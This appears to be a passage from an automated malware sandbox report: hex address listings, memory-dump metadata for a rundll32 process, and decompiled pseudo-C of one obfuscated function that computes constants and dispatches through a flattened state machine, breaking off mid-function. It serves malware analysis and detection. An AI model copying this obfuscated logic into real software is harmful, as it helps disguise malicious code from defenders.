                                                                                                                                  0x002dc0a6
                                                                                                                                  0x002dc0ae
                                                                                                                                  0x002dc0b6
                                                                                                                                  0x002dc0be
                                                                                                                                  0x002dc0c6
                                                                                                                                  0x002dc0ce
                                                                                                                                  0x002dc0d6
                                                                                                                                  0x002dc0de
                                                                                                                                  0x002dc0e6
                                                                                                                                  0x002dc0f1
                                                                                                                                  0x002dc0fc
                                                                                                                                  0x002dc107
                                                                                                                                  0x002dc112
                                                                                                                                  0x002dc11d
                                                                                                                                  0x002dc124
                                                                                                                                  0x002dc12f
                                                                                                                                  0x002dc137
                                                                                                                                  0x002dc13f
                                                                                                                                  0x002dc147
                                                                                                                                  0x002dc14c
                                                                                                                                  0x002dc154
                                                                                                                                  0x002dc166
                                                                                                                                  0x002dc16b
                                                                                                                                  0x002dc174
                                                                                                                                  0x002dc17f
                                                                                                                                  0x002dc18a
                                                                                                                                  0x002dc195
                                                                                                                                  0x002dc19d
                                                                                                                                  0x002dc1a8
                                                                                                                                  0x002dc1b0
                                                                                                                                  0x002dc1b8
                                                                                                                                  0x002dc1c0
                                                                                                                                  0x002dc1c5
                                                                                                                                  0x002dc1cd
                                                                                                                                  0x002dc1d8
                                                                                                                                  0x002dc1e3
                                                                                                                                  0x002dc1ee
                                                                                                                                  0x002dc1fa
                                                                                                                                  0x002dc1fd
                                                                                                                                  0x002dc201
                                                                                                                                  0x002dc206
                                                                                                                                  0x002dc20e
                                                                                                                                  0x002dc216
                                                                                                                                  0x002dc223
                                                                                                                                  0x002dc238
                                                                                                                                  0x002dc23b
                                                                                                                                  0x002dc242
                                                                                                                                  0x002dc24d
                                                                                                                                  0x002dc258
                                                                                                                                  0x002dc26e
                                                                                                                                  0x002dc275
                                                                                                                                  0x002dc280
                                                                                                                                  0x002dc293
                                                                                                                                  0x002dc296
                                                                                                                                  0x002dc29d
                                                                                                                                  0x002dc2a8
                                                                                                                                  0x002dc2b0
                                                                                                                                  0x002dc2c0
                                                                                                                                  0x002dc2c4
                                                                                                                                  0x002dc2cc
                                                                                                                                  0x002dc2d4
                                                                                                                                  0x002dc2dc
                                                                                                                                  0x002dc2e4
                                                                                                                                  0x002dc2ec
                                                                                                                                  0x002dc2f1
                                                                                                                                  0x002dc2f9
                                                                                                                                  0x002dc306
                                                                                                                                  0x002dc307
                                                                                                                                  0x002dc30b
                                                                                                                                  0x002dc313
                                                                                                                                  0x002dc31b
                                                                                                                                  0x002dc323
                                                                                                                                  0x002dc32e
                                                                                                                                  0x002dc336
                                                                                                                                  0x002dc341
                                                                                                                                  0x002dc349
                                                                                                                                  0x002dc351
                                                                                                                                  0x002dc361
                                                                                                                                  0x002dc365
                                                                                                                                  0x002dc36d
                                                                                                                                  0x002dc378
                                                                                                                                  0x002dc380
                                                                                                                                  0x002dc38b
                                                                                                                                  0x002dc396
                                                                                                                                  0x002dc3a3
                                                                                                                                  0x002dc3a7
                                                                                                                                  0x002dc3af
                                                                                                                                  0x002dc3b7
                                                                                                                                  0x002dc3cb
                                                                                                                                  0x002dc3d2
                                                                                                                                  0x002dc3dd
                                                                                                                                  0x002dc3e8
                                                                                                                                  0x002dc3f0
                                                                                                                                  0x002dc3fa
                                                                                                                                  0x002dc3fe
                                                                                                                                  0x002dc406
                                                                                                                                  0x002dc40e
                                                                                                                                  0x002dc419
                                                                                                                                  0x002dc424
                                                                                                                                  0x002dc42c
                                                                                                                                  0x002dc437
                                                                                                                                  0x002dc43f
                                                                                                                                  0x002dc447
                                                                                                                                  0x002dc455
                                                                                                                                  0x002dc456
                                                                                                                                  0x002dc45b
                                                                                                                                  0x002dc466
                                                                                                                                  0x002dc46b
                                                                                                                                  0x002dc46f
                                                                                                                                  0x002dc477
                                                                                                                                  0x002dc48a
                                                                                                                                  0x002dc491
                                                                                                                                  0x002dc49c
                                                                                                                                  0x002dc4a7
                                                                                                                                  0x002dc4b2
                                                                                                                                  0x002dc4bd
                                                                                                                                  0x002dc4c8
                                                                                                                                  0x002dc4d0
                                                                                                                                  0x002dc4dd
                                                                                                                                  0x002dc4e6
                                                                                                                                  0x002dc4ea
                                                                                                                                  0x002dc4f2
                                                                                                                                  0x002dc4fd
                                                                                                                                  0x002dc505
                                                                                                                                  0x002dc510
                                                                                                                                  0x002dc51b
                                                                                                                                  0x002dc523
                                                                                                                                  0x002dc52e
                                                                                                                                  0x002dc542
                                                                                                                                  0x002dc549
                                                                                                                                  0x002dc554
                                                                                                                                  0x002dc55f
                                                                                                                                  0x002dc572
                                                                                                                                  0x002dc579
                                                                                                                                  0x002dc584
                                                                                                                                  0x002dc594
                                                                                                                                  0x002dc5a1
                                                                                                                                  0x002dc5a5
                                                                                                                                  0x002dc5ad
                                                                                                                                  0x002dc5b5
                                                                                                                                  0x002dc5b9
                                                                                                                                  0x002dc5c1
                                                                                                                                  0x002dc5c9
                                                                                                                                  0x002dc5d1
                                                                                                                                  0x002dc5dc
                                                                                                                                  0x002dc5e7
                                                                                                                                  0x002dc5f2
                                                                                                                                  0x002dc5fd
                                                                                                                                  0x002dc608
                                                                                                                                  0x002dc610
                                                                                                                                  0x002dc61b
                                                                                                                                  0x002dc623
                                                                                                                                  0x002dc628
                                                                                                                                  0x002dc62d
                                                                                                                                  0x002dc635
                                                                                                                                  0x002dc63d
                                                                                                                                  0x002dc63d
                                                                                                                                  0x002dc63d
                                                                                                                                  0x002dc642
                                                                                                                                  0x002dc642
                                                                                                                                  0x002dc647
                                                                                                                                  0x002dc647
                                                                                                                                  0x002dc647
                                                                                                                                  0x002dc64c
                                                                                                                                  0x002dc64c
                                                                                                                                  0x002dc64c
                                                                                                                                  0x002dc64c
                                                                                                                                  0x002dc64e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dc654
                                                                                                                                  0x002dc917
                                                                                                                                  0x002dc91c
                                                                                                                                  0x002dc924
                                                                                                                                  0x002dc926
                                                                                                                                  0x002dc92b
                                                                                                                                  0x00000000
                                                                                                                                  0x002dc65a
                                                                                                                                  0x002dc660
                                                                                                                                  0x002dc83b
                                                                                                                                  0x002dc847
                                                                                                                                  0x002dc852
                                                                                                                                  0x002dc857
                                                                                                                                  0x002dc865
                                                                                                                                  0x002dc89e
                                                                                                                                  0x002dc8a5
                                                                                                                                  0x002dc8b4
                                                                                                                                  0x002dc8c5
                                                                                                                                  0x002dc8c8
                                                                                                                                  0x002dc8d8
                                                                                                                                  0x002dc8de
                                                                                                                                  0x00000000
                                                                                                                                  0x002dc666
                                                                                                                                  0x002dc66c
                                                                                                                                  0x002dca66
                                                                                                                                  0x002dca7b
                                                                                                                                  0x002dc672
                                                                                                                                  0x002dc674
                                                                                                                                  0x002dc779
                                                                                                                                  0x002dc782
                                                                                                                                  0x002dc790
                                                                                                                                  0x002dc796
                                                                                                                                  0x002dc799
                                                                                                                                  0x002dc7a2
                                                                                                                                  0x002dc7ac
                                                                                                                                  0x002dc7e3
                                                                                                                                  0x002dc7e8
                                                                                                                                  0x002dc7eb
                                                                                                                                  0x002dc7f2
                                                                                                                                  0x002dc821
                                                                                                                                  0x002dc7f4
                                                                                                                                  0x002dc805
                                                                                                                                  0x002dc812
                                                                                                                                  0x002dc817
                                                                                                                                  0x002dc81a
                                                                                                                                  0x002dc81a
                                                                                                                                  0x002dc830
                                                                                                                                  0x00000000
                                                                                                                                  0x002dc67a
                                                                                                                                  0x002dc680
                                                                                                                                  0x002dc76f
                                                                                                                                  0x00000000
                                                                                                                                  0x002dc686
                                                                                                                                  0x002dc688
                                                                                                                                  0x002dc752
                                                                                                                                  0x002dc759
                                                                                                                                  0x002dc765
                                                                                                                                  0x002dc767
                                                                                                                                  0x002dc63d
                                                                                                                                  0x002dc63d
                                                                                                                                  0x002dc63d
                                                                                                                                  0x002dc642
                                                                                                                                  0x002dc647
                                                                                                                                  0x002dc647
                                                                                                                                  0x00000000
                                                                                                                                  0x002dc647
                                                                                                                                  0x002dc68e
                                                                                                                                  0x002dc68e
                                                                                                                                  0x002dc694
                                                                                                                                  0x002dc69a
                                                                                                                                  0x002dc6a6
                                                                                                                                  0x002dc6ae
                                                                                                                                  0x002dc6b4
                                                                                                                                  0x002dc6f8
                                                                                                                                  0x002dc71c
                                                                                                                                  0x002dc71f
                                                                                                                                  0x002dc724
                                                                                                                                  0x002dc727
                                                                                                                                  0x002dc727
                                                                                                                                  0x002dca3e
                                                                                                                                  0x002dca3e
                                                                                                                                  0x002dca43
                                                                                                                                  0x002dca48
                                                                                                                                  0x002dca48
                                                                                                                                  0x00000000
                                                                                                                                  0x002dc694
                                                                                                                                  0x002dc688
                                                                                                                                  0x002dc680
                                                                                                                                  0x002dc674
                                                                                                                                  0x002dc66c
                                                                                                                                  0x002dc660
                                                                                                                                  0x002dca85
                                                                                                                                  0x002dca8f
                                                                                                                                  0x002dca8f
                                                                                                                                  0x002dc933
                                                                                                                                  0x002dc935
                                                                                                                                  0x002dca2c
                                                                                                                                  0x002dca33
                                                                                                                                  0x002dca39
                                                                                                                                  0x002dca3b
                                                                                                                                  0x00000000
                                                                                                                                  0x002dc93b
                                                                                                                                  0x002dc93b
                                                                                                                                  0x002dc941
                                                                                                                                  0x002dca15
                                                                                                                                  0x002dca1b
                                                                                                                                  0x00000000
                                                                                                                                  0x002dc947
                                                                                                                                  0x002dc947
                                                                                                                                  0x002dc94d
                                                                                                                                  0x002dc9f3
                                                                                                                                  0x002dc9f9
                                                                                                                                  0x002dc63d
                                                                                                                                  0x002dc63d
                                                                                                                                  0x002dc63d
                                                                                                                                  0x00000000
                                                                                                                                  0x002dc63d
                                                                                                                                  0x002dc953
                                                                                                                                  0x002dc953
                                                                                                                                  0x002dc955
                                                                                                                                  0x002dc9ce
                                                                                                                                  0x002dc9d4
                                                                                                                                  0x002dc63d
                                                                                                                                  0x002dc63d
                                                                                                                                  0x002dc63d
                                                                                                                                  0x00000000
                                                                                                                                  0x002dc63d
                                                                                                                                  0x002dc957
                                                                                                                                  0x002dc957
                                                                                                                                  0x002dc95d
                                                                                                                                  0x00000000
                                                                                                                                  0x002dc963
                                                                                                                                  0x002dc97c
                                                                                                                                  0x002dc995
                                                                                                                                  0x002dc99c
                                                                                                                                  0x002dc9ab
                                                                                                                                  0x002dc9ad
                                                                                                                                  0x002dc9b2
                                                                                                                                  0x002dc9b7
                                                                                                                                  0x00000000
                                                                                                                                  0x002dc9b7
                                                                                                                                  0x002dc95d
                                                                                                                                  0x002dc955
                                                                                                                                  0x002dc94d
                                                                                                                                  0x002dc941
                                                                                                                                  0x00000000
                                                                                                                                  0x002dca4d
                                                                                                                                  0x002dca4d
                                                                                                                                  0x00000000
                                                                                                                                  0x002dca59
                                                                                                                                  0x002dc647
                                                                                                                                  0x002dc642

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ;<=$@_`$CA$D#$Kbf:$PB5$Y/c$cg.B$e($gc49$ll~$sJ$tEt$uP$vj$O~t$iS$ja*
                                                                                                                                  • API String ID: 0-258179307
                                                                                                                                  • Opcode ID: 78ee6cec11cb2b19c1015130cd9c99dd7dc60cd7f9cfda0b08fa834503fb8993
                                                                                                                                  • Instruction ID: 5b423e24b1cb9fb5fdfca2a603aa9412b4e19df8e6cf8e7222984cf29ec71482
                                                                                                                                  • Opcode Fuzzy Hash: 78ee6cec11cb2b19c1015130cd9c99dd7dc60cd7f9cfda0b08fa834503fb8993
                                                                                                                                  • Instruction Fuzzy Hash: 9972F371509381DFD378CF25C58AA9BBBE2BBC4304F20891EE6DA86260D7B18955DF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E4B87 Relevance: 23.1, Strings: 18, Instructions: 604COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E002E4B87(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				intOrPtr _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				void* _t703;
				void* _t707;
				signed int _t708;
				signed int _t717;
				void* _t730;
				void* _t736;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				void* _t758;
				signed int _t798;
				void* _t803;
				void* _t804;
				void* _t811;

				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0xa2c333;
				_v2612 = 0xd97943;
				_v2696 = 0x74b91;
				_v2696 = _v2696 + 0xffffab65;
				_v2696 = _v2696 ^ 0x0006f6df;
				_v2804 = 0x130b03;
				_v2804 = _v2804 << 9;
				_v2804 = _v2804 + 0x8374;
				_v2804 = _v2804 ^ 0x26068974;
				_v2876 = 0x240a80;
				_v2876 = _v2876 >> 6;
				_v2876 = _v2876 >> 5;
				_v2876 = _v2876 ^ 0x3e269fec;
				_v2876 = _v2876 ^ 0x3e253447;
				_v2924 = 0x49db5b;
				_v2924 = _v2924 + 0xd552;
				_t803 = __ecx;
				_t798 = 0xce4571;
				_t738 = 0x27;
				_v2924 = _v2924 / _t738;
				_v2924 = _v2924 + 0x3019;
				_v2924 = _v2924 ^ 0x0006d24f;
				_v2796 = 0xf8ea63;
				_v2796 = _v2796 << 3;
				_v2796 = _v2796 + 0x8798;
				_v2796 = _v2796 ^ 0x07c9cae5;
				_v2864 = 0x679d3b;
				_t739 = 0x25;
				_v2864 = _v2864 * 0x7a;
				_v2864 = _v2864 / _t739;
				_v2864 = _v2864 << 0xc;
				_v2864 = _v2864 ^ 0x5a5eda92;
				_v2688 = 0xbc1f25;
				_v2688 = _v2688 << 0xd;
				_v2688 = _v2688 ^ 0x83e15555;
				_v2700 = 0xc3e9b4;
				_v2700 = _v2700 ^ 0x7e7d7a5b;
				_v2700 = _v2700 ^ 0x7ebc2479;
				_v2684 = 0x348655;
				_v2684 = _v2684 + 0xffff5240;
				_v2684 = _v2684 ^ 0x0038d539;
				_v2836 = 0xc8c90d;
				_v2836 = _v2836 | 0x6050777e;
				_v2836 = _v2836 + 0xfffffb37;
				_v2836 = _v2836 << 0xe;
				_v2836 = _v2836 ^ 0x3ea8df0c;
				_v2664 = 0x4ea234;
				_v2664 = _v2664 ^ 0x152f142f;
				_v2664 = _v2664 ^ 0x1568dd81;
				_v2900 = 0xa78742;
				_v2900 = _v2900 * 0x70;
				_v2900 = _v2900 + 0x89c7;
				_v2900 = _v2900 * 0x26;
				_v2900 = _v2900 ^ 0xe13351a3;
				_v2752 = 0x43c729;
				_v2752 = _v2752 * 9;
				_v2752 = _v2752 >> 0xc;
				_v2752 = _v2752 ^ 0x0004a0a7;
				_v2656 = 0x163ba0;
				_v2656 = _v2656 | 0x3b2cca0a;
				_v2656 = _v2656 ^ 0x3b3c61f3;
				_v2800 = 0x539f85;
				_v2800 = _v2800 + 0xffff9927;
				_v2800 = _v2800 >> 0xd;
				_v2800 = _v2800 ^ 0x000ca278;
				_v2892 = 0xaa9f70;
				_v2892 = _v2892 | 0xffd04745;
				_t740 = 0x33;
				_v2892 = _v2892 * 0x48;
				_v2892 = _v2892 + 0xabed;
				_v2892 = _v2892 ^ 0xfe85b4b6;
				_v2728 = 0x66b1f8;
				_v2728 = _v2728 + 0xffffb85a;
				_v2728 = _v2728 + 0xffff17c5;
				_v2728 = _v2728 ^ 0x00666892;
				_v2792 = 0x34b823;
				_v2792 = _v2792 + 0x705f;
				_v2792 = _v2792 | 0x13d147dd;
				_v2792 = _v2792 ^ 0x13fd2081;
				_v2884 = 0x7f5269;
				_v2884 = _v2884 >> 0x10;
				_v2884 = _v2884 + 0xdf59;
				_v2884 = _v2884 ^ 0x086ba2e3;
				_v2884 = _v2884 ^ 0x086346ed;
				_v2784 = 0x4150c;
				_v2784 = _v2784 ^ 0xadfae27c;
				_v2784 = _v2784 << 0xf;
				_v2784 = _v2784 ^ 0x7bb89155;
				_v2860 = 0x3ff4f9;
				_v2860 = _v2860 + 0x97ef;
				_v2860 = _v2860 ^ 0x8a52113e;
				_v2860 = _v2860 * 0x3b;
				_v2860 = _v2860 ^ 0xd244680a;
				_v2920 = 0xf20633;
				_v2920 = _v2920 >> 0xa;
				_v2920 = _v2920 << 6;
				_v2920 = _v2920 | 0x86ded8f3;
				_v2920 = _v2920 ^ 0x86d0715a;
				_v2676 = 0xbc4416;
				_v2676 = _v2676 + 0x253a;
				_v2676 = _v2676 ^ 0x00bded5f;
				_v2928 = 0x15fa7c;
				_v2928 = _v2928 >> 1;
				_v2928 = _v2928 * 0x6e;
				_v2928 = _v2928 >> 4;
				_v2928 = _v2928 ^ 0x00445a38;
				_v2844 = 0xaff44e;
				_v2844 = _v2844 * 0x28;
				_v2844 = _v2844 ^ 0x281c7ad4;
				_v2844 = _v2844 * 0xe;
				_v2844 = _v2844 ^ 0xcf625ac8;
				_v2744 = 0x5c05ba;
				_v2744 = _v2744 << 1;
				_v2744 = _v2744 ^ 0x54918a83;
				_v2744 = _v2744 ^ 0x542c1472;
				_v2904 = 0xa399f4;
				_v2904 = _v2904 / _t740;
				_t741 = 9;
				_v2904 = _v2904 / _t741;
				_v2904 = _v2904 >> 0xb;
				_v2904 = _v2904 ^ 0x000d27e7;
				_v2912 = 0xbe4d5b;
				_v2912 = _v2912 << 2;
				_v2912 = _v2912 >> 8;
				_v2912 = _v2912 + 0xbc5;
				_v2912 = _v2912 ^ 0x000f01bd;
				_v2888 = 0xb7f9c;
				_v2888 = _v2888 ^ 0x23a090a0;
				_v2888 = _v2888 + 0xffffcb65;
				_v2888 = _v2888 + 0xffffb53f;
				_v2888 = _v2888 ^ 0x23a896a2;
				_v2776 = 0xcbb323;
				_v2776 = _v2776 + 0x81c3;
				_v2776 = _v2776 >> 1;
				_v2776 = _v2776 ^ 0x00676393;
				_v2648 = 0x271f91;
				_v2648 = _v2648 + 0xffff9397;
				_v2648 = _v2648 ^ 0x0029f035;
				_v2896 = 0x78618c;
				_v2896 = _v2896 << 0xc;
				_v2896 = _v2896 ^ 0x0a821cde;
				_v2896 = _v2896 + 0xb475;
				_v2896 = _v2896 ^ 0x8c94da80;
				_v2720 = 0xacdc2a;
				_v2720 = _v2720 | 0x57611697;
				_v2720 = _v2720 ^ 0xc01b1ef4;
				_v2720 = _v2720 ^ 0x97fc8dfe;
				_v2668 = 0x55603e;
				_v2668 = _v2668 >> 1;
				_v2668 = _v2668 ^ 0x002dad1d;
				_v2828 = 0xf126f6;
				_t742 = 0x29;
				_v2828 = _v2828 * 0x43;
				_v2828 = _v2828 + 0x8cbb;
				_v2828 = _v2828 ^ 0x3f126f56;
				_v2768 = 0x9c087b;
				_v2768 = _v2768 << 9;
				_v2768 = _v2768 + 0xffffe171;
				_v2768 = _v2768 ^ 0x3813f585;
				_v2880 = 0xb815a3;
				_v2880 = _v2880 ^ 0x72879ea7;
				_v2880 = _v2880 / _t742;
				_v2880 = _v2880 + 0xc3b;
				_v2880 = _v2880 ^ 0x02c00b8a;
				_v2872 = 0xffe9a8;
				_v2872 = _v2872 | 0x05f4b9e7;
				_v2872 = _v2872 + 0xffff2424;
				_v2872 = _v2872 << 7;
				_v2872 = _v2872 ^ 0xff8a2c7e;
				_v2808 = 0x17a98a;
				_t743 = 0x6a;
				_v2808 = _v2808 * 0x35;
				_v2808 = _v2808 + 0x8a0b;
				_v2808 = _v2808 ^ 0x04e27d5d;
				_v2644 = 0x3aca8c;
				_v2644 = _v2644 | 0x1dba2023;
				_v2644 = _v2644 ^ 0x1dba33fd;
				_v2760 = 0xa9a4ba;
				_v2760 = _v2760 ^ 0x6721c4f3;
				_v2760 = _v2760 + 0xffff7b43;
				_v2760 = _v2760 ^ 0x6786e634;
				_v2660 = 0xef5940;
				_t327 =  &_v2660; // 0xef5940
				_v2660 =  *_t327 / _t743;
				_v2660 = _v2660 ^ 0x0008b7a5;
				_v2640 = 0x8c91f9;
				_v2640 = _v2640 + 0x2aa0;
				_v2640 = _v2640 ^ 0x008fd6f1;
				_v2716 = 0xebae10;
				_v2716 = _v2716 + 0x2e93;
				_v2716 = _v2716 >> 3;
				_v2716 = _v2716 ^ 0x0012b27f;
				_v2692 = 0xf4ef17;
				_v2692 = _v2692 ^ 0x14a8ca79;
				_v2692 = _v2692 ^ 0x145940a6;
				_v2712 = 0x90da21;
				_v2712 = _v2712 * 0x5c;
				_v2712 = _v2712 << 6;
				_v2712 = _v2712 ^ 0x039c340b;
				_v2812 = 0x599c06;
				_v2812 = _v2812 | 0x7b64813d;
				_v2812 = _v2812 * 0x3e;
				_v2812 = _v2812 ^ 0xe8633365;
				_v2748 = 0x57b46;
				_t744 = 0x38;
				_v2748 = _v2748 / _t744;
				_v2748 = _v2748 + 0xffffe4a2;
				_v2748 = _v2748 ^ 0xffff7983;
				_v2856 = 0xb347e1;
				_v2856 = _v2856 << 0xf;
				_v2856 = _v2856 + 0xc3e6;
				_v2856 = _v2856 ^ 0xcd6ff0ef;
				_v2856 = _v2856 ^ 0x6e991901;
				_v2756 = 0x3d21e7;
				_v2756 = _v2756 + 0x4052;
				_v2756 = _v2756 + 0xfab6;
				_v2756 = _v2756 ^ 0x0033d413;
				_v2680 = 0xeea097;
				_v2680 = _v2680 * 0x29;
				_v2680 = _v2680 ^ 0x26367c85;
				_v2852 = 0x9a84c7;
				_v2852 = _v2852 << 4;
				_v2852 = _v2852 + 0x5305;
				_v2852 = _v2852 * 0x47;
				_v2852 = _v2852 ^ 0xadc8f5b7;
				_v2736 = 0x1d92c0;
				_v2736 = _v2736 ^ 0x4e3febcd;
				_v2736 = _v2736 ^ 0x2a5eeaad;
				_v2736 = _v2736 ^ 0x647637b5;
				_v2916 = 0x7a6f6e;
				_v2916 = _v2916 << 3;
				_v2916 = _v2916 | 0x74549758;
				_v2916 = _v2916 * 0x5e;
				_v2916 = _v2916 ^ 0x014df6ca;
				_v2820 = 0x88f64;
				_v2820 = _v2820 << 0xb;
				_v2820 = _v2820 ^ 0x8d7f89a1;
				_v2820 = _v2820 ^ 0xc90720e1;
				_v2672 = 0x9d7b6a;
				_v2672 = _v2672 * 0x74;
				_v2672 = _v2672 ^ 0x47521deb;
				_v2868 = 0x2a980b;
				_v2868 = _v2868 << 2;
				_v2868 = _v2868 * 0x37;
				_v2868 = _v2868 * 0x45;
				_v2868 = _v2868 ^ 0xdda58f8d;
				_v2704 = 0xd94882;
				_v2704 = _v2704 >> 7;
				_v2704 = _v2704 ^ 0x000dd1c5;
				_v2908 = 0x8685cf;
				_v2908 = _v2908 >> 6;
				_v2908 = _v2908 + 0x478f;
				_v2908 = _v2908 | 0x9a4acbdf;
				_v2908 = _v2908 ^ 0x9a416c75;
				_v2724 = 0x3983d7;
				_v2724 = _v2724 ^ 0xaf8ece10;
				_v2724 = _v2724 + 0xfffffe8c;
				_v2724 = _v2724 ^ 0xafb9f002;
				_v2652 = 0xb48fd9;
				_v2652 = _v2652 >> 7;
				_v2652 = _v2652 ^ 0x0003170e;
				_v2732 = 0x26e706;
				_v2732 = _v2732 + 0xffff7cb3;
				_v2732 = _v2732 << 7;
				_v2732 = _v2732 ^ 0x13307998;
				_v2840 = 0xdaf489;
				_v2840 = _v2840 ^ 0x20b9ad9c;
				_v2840 = _v2840 + 0xa5fa;
				_v2840 = _v2840 ^ 0x206e4944;
				_v2848 = 0x15799;
				_v2848 = _v2848 + 0xffffbd76;
				_v2848 = _v2848 | 0x84cc3dff;
				_v2848 = _v2848 ^ 0x84c4ee28;
				_v2740 = 0x344f78;
				_v2740 = _v2740 | 0xed30b44e;
				_v2740 = _v2740 + 0x582d;
				_v2740 = _v2740 ^ 0xed3a4892;
				_v2764 = 0x3aec11;
				_t745 = 0x14;
				_v2764 = _v2764 * 0x24;
				_v2764 = _v2764 * 0xd;
				_v2764 = _v2764 ^ 0x6bb19aaa;
				_v2772 = 0xa2a4e3;
				_v2772 = _v2772 * 0x54;
				_v2772 = _v2772 + 0xd74c;
				_v2772 = _v2772 ^ 0x35517ae7;
				_v2780 = 0xc7cad3;
				_v2780 = _v2780 ^ 0xe16f0727;
				_v2780 = _v2780 + 0xa55f;
				_v2780 = _v2780 ^ 0xe1ad612a;
				_v2788 = 0x30bac2;
				_v2788 = _v2788 << 2;
				_v2788 = _v2788 * 0x19;
				_v2788 = _v2788 ^ 0x130f6af8;
				_v2708 = 0x5b81b7;
				_v2708 = _v2708 << 0xd;
				_v2708 = _v2708 ^ 0x7032fecb;
				_v2816 = 0xe0b39a;
				_v2816 = _v2816 + 0xf3c;
				_v2816 = _v2816 * 0x29;
				_v2816 = _v2816 ^ 0x23fa5b32;
				_v2832 = 0xb37143;
				_v2832 = _v2832 + 0xffff99de;
				_v2832 = _v2832 / _t745;
				_v2832 = _v2832 | 0xcb90c15e;
				_v2832 = _v2832 ^ 0xcb9cb56b;
				_v2824 = 0xf7e429;
				_v2824 = _v2824 << 0x10;
				_v2824 = _v2824 ^ 0x4b169193;
				_v2824 = _v2824 ^ 0xaf30b470;
				_t703 = E002E7CDB(_t745);
				_t797 = _v2708;
				_t736 = _t703;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t811 = _t798 - 0xa06a9d5;
							if(_t811 <= 0) {
								break;
							}
							__eflags = _t798 - 0xae01df1;
							if(__eflags == 0) {
								_push(_v2740);
								_push(0);
								_push(_t745);
								_push(1);
								_push(0);
								_push(_v2848);
								_t745 = _v2732;
								_push( &_v524);
								E002DAB87(_t745, _v2840, __eflags);
								_t804 = _t804 + 0x1c;
								_t798 = 0xfe27958;
								_t707 = 0x8a3cf08;
								goto L24;
							} else {
								__eflags = _t798 - 0xb104717;
								if(_t798 == 0xb104717) {
									_t745 = _v2748;
									_t708 = E002D4816(_t745, _v2632, _v2856, _v2636, _v2756, _v2680);
									_t797 = _t708;
									_t804 = _t804 + 0x10;
									__eflags = _t708;
									_t707 = 0x8a3cf08;
									_t798 =  !=  ? 0x8a3cf08 : 0xa06a9d5;
									continue;
								} else {
									__eflags = _t798 - 0xe3ea8aa;
									if(_t798 == 0xe3ea8aa) {
										return E002E1E67(_v2708, _v2816, _v2832, _v2824, _v2628);
									}
									__eflags = _t798 - 0xfe27958;
									if(_t798 != 0xfe27958) {
										goto L24;
									} else {
										E002E8519(_v2764, _v2772, _t797);
										_pop(_t745);
										_t798 = 0xa06a9d5;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
							L27:
							return _t717;
						}
						if(_t811 == 0) {
							E002E8519(_v2780, _v2788, _v2636);
							_pop(_t745);
							_t798 = 0xe3ea8aa;
							while(1) {
								L1:
								goto L2;
							}
						}
						if(_t798 == 0xce4571) {
							_push(_v2700);
							_push(_v2696);
							_push(_v2688);
							_t745 = _v2796;
							_push( &_v1044);
							E002E46BB(_t745, _v2864);
							_t804 = _t804 - 0xc + 0x1c;
							_t798 = 0x2f0d176;
							while(1) {
								L1:
								goto L2;
							}
						}
						if(_t798 == 0x277711d) {
							_v2624 = E002D59E9();
							_v2620 = 2 + E002DCB52(_v2668, _t714, _v2828, _v2768, _v2880) * 2;
							_t745 =  &_v2628;
							_t717 = E002E8727(_t745, _v2804, _v2668, _v2872, _v2808, _v2668, _v2644, _t736, _t736, _v2760, _t736, _v2660, _v2640);
							_t804 = _t804 + 0x38;
							__eflags = _t717;
							if(__eflags != 0) {
								_t798 = 0x47e8611;
								goto L1;
							}
						} else {
							if(_t798 == 0x2f0d176) {
								E002EDA22(_v2684, _v2836, __eflags, _v2664,  &_v2084, _t745, _v2900);
								 *((short*)(E002DB6CF( &_v2084, _v2752, _v2656, _v2800))) = 0;
								E002D8969(_v2892,  &_v1564, __eflags, _v2728, _v2792);
								_push(_v2860);
